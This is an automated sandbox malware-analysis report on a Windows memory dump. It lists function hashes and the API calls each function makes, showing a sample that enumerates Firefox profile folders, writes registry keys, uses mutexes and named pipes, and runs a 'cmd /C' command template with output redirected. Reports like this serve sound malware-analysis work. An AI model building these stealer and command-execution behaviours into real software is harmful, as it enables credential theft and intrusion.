  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
